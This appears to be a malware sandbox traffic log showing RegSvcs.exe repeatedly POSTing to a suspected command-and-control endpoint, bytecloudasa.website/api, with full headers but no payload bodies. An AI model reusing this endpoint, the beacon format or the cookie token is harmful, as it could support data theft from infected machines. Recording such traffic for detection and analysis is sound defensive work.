CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fuKR97JdmvaH0xwOsbImlZR%2FUL5ffboCt6LUwXGrRdl6JPcpCVa0dLCjqmFXO%2FK3tn%2BXF5BWgPJFtfKo52A39bbXfERuxZp3lMlGInIO4%2BFj%2BnWEtQxZX%2Fo%2F47gCSjiVMNy6EyBs5g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5a79b93b8ba-AMS
DNS

39.212.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

39.212.67.172.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: bytecloudasa.website
Content-Length: 56
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6kdb6dm2236c46ujuds0nuga6n; expires=Sat, 03 Feb 2024 20:43:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c9et56nQdXlywhkBPGu3ibHZTQ9rahP7R1pjEGBdKO9suXU0PJI%2BCGSSj5KKmxuSMGjISv5yOd1tFHLi%2BxvkdCydFeCJOkxRfLhO0b15O%2BqMQ7bdbSpw6ERYe1uxnL3D6H49BcF1YA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5a60b8e0e87-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5erq9aduqje86j1udi8eiujjgb; expires=Sat, 03 Feb 2024 20:43:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TVxehSqO47TWLJJqokEWmHuhT6ai%2Ff5%2Bzp2XIoFgG3aVm4rMqZxfZ1J%2FUv53mbiK%2FM5FtzPqxSIvyOVxjXT0pX1V3AJUmwK2DJR98mC%2Fjyr6Vy%2BF4i7l2vUPk6s7QPEZ49z6U5la4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5a8f9e70bdb-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=kbqfqckt8i2nr18c488bd112d6; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1xswC%2FS2%2FPmX3Mb10T%2F18hN86jckzehIqCUEuSV0e8WTlguyzPr72TqDz%2BHtlgtTI1jku8a2eC%2F92A8KLXvov3%2BWrWN0V%2BiSmyEVtAEqKymOE21ZuDPNVYFSl9ErE4vSUh88mwNy1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5ab5a3d6632-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bnqkp6mbnu1vj10c2utbh06ud0; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HXAnok%2F3piSOcBmG6C7Lb%2F5LZPBGFoWW3EtjHepRi58TzgvAzFx7VHomF%2FO8nRcPR0tBBzuD1igb1XkYKDZxIQcKcHF3JbCRixd2sqSc2v3yz34XZC0YQM98jdgeADEdYNaoUmhHbA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5ac7aeb666e-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=iiuklfu5kr016816t91r7dp3sp; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NltQj2Nu33PpanqYaSm3hcv1t9%2BI1piN76Xms5fxC4NhPxG28sHB2m4bfIjWi%2F2n%2Fkbm2a3If1%2BLkBpRIZ%2B32ywISm2cBnahS5SIpujtb2WFYpO5zc91YaeRkzQzrwVj1oaWZQTaFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5ad58216681-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=i1aosqino70r6m2n01fau0l161; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qV4bTNojsLurvDMFeicGHCty1mwSQttEMqaNrK0k1RrH3wbHqh7BDKmbxg8EH%2FBJefAZoI29j4Mm6bjE7YDV0Jj8kwijdGHWbLgZc9mvYfaLQi%2FEO%2FEia9%2FLGWcBewDpRJ%2BQrVaeJA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5ae09626630-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9n1tuvrgm0mmme1itdkjk63r0b; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oL%2Bf7xDhOAsBCEWxehNOs%2BdaLjHUQ46y0NIT51RRq2e5Nhrmhu5i5TVrxJRReKQvFhbwiqbZjoWkv45PKW2CRzqbBQRzNAjY6C2wEqi8lzMxY%2BgttOXJjB8wuim4FnUM2sknhk1XAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5aeccf9b8e4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ieipr1577isdjo4eusnjohqmlr; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EYuy5UNy0hhnAWybZNvLKejzz%2FjYRVcOdIalwYiN3d47n8%2BmMJ%2BWlEtIqgr3Q5z21IrXDUjKfLksUDI7jXVBG%2FW6NphXPG6RublPnrFLB%2FYIE5cqaRvBzSwNYMZ3aj9lrspBiFNxgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5af8bcf0b4e-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dhs3cgipsvgedgg2hb8jnqgvgs; expires=Sat, 03 Feb 2024 20:43:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4DRGoXkx106Zkb7u67dxb761xTZ8KFLFxRfIJZNs3q0LkWB7BxWPgKyLAQKGSMNwhPsaDGP200rUT4Ktt7TXStR%2FKJFd2v4eemt%2Fz%2BEkg3eAbzOo7QLSjsaNzwqQwIMTqQs19ILctg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b07a3c5c37-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=paamals89qm9po7u0g6j4nmlmb; expires=Sat, 03 Feb 2024 20:43:56 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:17 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xC6fvnfm4gXYLYI9csISZTejA5BaYo%2Fcj0ncZb581RDFOGWrFmECxOKHjJPi91vN9XDKK46djJ9SEAXNrVezpajc6aQ6C82KnHencBiaB8Hdz6XoaoONSyLUvt5mpp1SHbJNMoG5Kw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b12ab91caa-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=rf0qaf8cl7kiljqb5mhunlcgv2; expires=Sat, 03 Feb 2024 20:43:56 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:17 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ssBFRBeL2q5Myw2lFIvWfu5QJTN2%2BzLOcf4iKS8ZMQPpMqKN%2Fb7s1cwNRSN2V7Rn9tVyCsMrm47ivGy58KoGrbtrhD7LLCXgx6yaYp8gX8hdvRssXw2E%2FyVs633cOUSpyH8YKUgUBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b209ed656f-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16140
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=iuqfahmdck3ome85fhhk4auid5; expires=Sat, 03 Feb 2024 20:43:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pwU2zEtT10uv55aEqI6AYl%2FAfs%2Fx9nnLy6cmt5H725pMn32RSz8uyg0ij2kdLq0hYO%2F%2BbYBEw4DZXHrIn%2FvYuI3Ukgc5Qy0EPHltAb8Zh0i2z51fPrFH%2FSLQ%2FWvm3sPte77IRlgMEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b46d9f0bd0-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8a7c4fpkn3a0p7j1c8rjdu0rhv; expires=Sat, 03 Feb 2024 20:43:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2B1pOA%2B1C9t%2FiZahNJqndaVsbL0IGN6HaGWcVP8QoDNwXXFCCkVs7r51nUgutV%2F5KaNXOW2NwcZi9FBWB59WY%2BXF5p%2FpuHsx1BYw18Sac7tE6QQa7U7UsN4V2oCrEtIsHuvG4ZA2iQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b87f9d06c0-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=fg56h92o27ev2emoquadq9a4e1; expires=Sat, 03 Feb 2024 20:43:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bjo5Pe6PtM9rWok4qxui7CmV8Tlc8XEoJ%2B1jhts0zt9f1UfGKvfALjV9%2FzVn7qn1fm%2Fof5KxdX7N%2B3t%2BUhs1P3ku%2FYEA9Vll9GBEgPP1N4DkQhUoRFbmt49M5ir5iAAHH27GFp5SvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5b958980a79-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=smb52b979tabgrean29l3morfg; expires=Sat, 03 Feb 2024 20:43:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
